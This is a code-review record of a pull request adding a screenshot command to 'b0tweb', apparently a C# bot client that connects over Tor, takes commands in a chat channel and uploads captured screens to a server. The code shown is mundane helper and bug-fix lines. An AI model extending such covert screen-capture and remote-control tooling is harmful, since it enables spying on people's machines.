### PR TITLE
Command screenshot

### PR DESCRIPTION
**Pull request by x0rz3q**

### CODE REVIEW

**Comment by x0rz3q** [comment]
TODO: Find path to store the pictures in, probably somewhere in `%appdata%` because it is writable by the user.

**Comment by x0rz3q** [comment]
#14 Should be merged first, because I needed some HTTP functionality etc.

File: b0tweb/FileHelper.cs [hunk 1]
```diff
@@ -0,0 +1,43 @@
...
+{
+    /// <summary>
+    /// FileHelper implements general file operations we need in the b0tweb.
+    /// </summary>
+    class FileHelper
+    {
+        public static string GetBasePath()
+        {
+            return Path.GetDirectoryName(Assembly.GetExecutingAssembly().Location);
+        }
```
Comment (x0rz3q) [inline b0tweb/FileHelper.cs]: Documentation is missing

Comment (JurisMajors) [reply b0tweb/FileHelper.cs]: image

**Comment by JurisMajors** [comment]
```<jurkons> * screenshot
<bot_DESKTOP-IQ3R0NV_782> The uploaded file exceeds the upload_max_filesize directive in php.ini```
Need to change the server setting since I can't even upload my two screens. C# sense looks fine

File: b0tweb/Program.cs [hunk 2]
```diff
@@ -23,7 +24,7 @@ public static void Main(string[] args)
 
             TorProxy proxy = new TorProxy();
             proxy.Establish();
-
+            Thread.Sleep(5); //wait for connection to be established
```
Comment (JurisMajors) [inline b0tweb/Program.cs]:
```suggestion
            Thread.Sleep(5); // wait for connection to be established
```

File: b0tweb/TorProxy.cs [hunk 3]
```diff
@@ -57,7 +57,7 @@ public void Establish()
         /// </summary>
         public void Disconnect()
         {
-            if (!this._process.HasExited)
+            if (this._process != null  && !this._process.HasExited)
```
Comment (JurisMajors) [inline b0tweb/TorProxy.cs]:
```suggestion
            if (this._process != null && !this._process.HasExited)
```

**Pull request merged**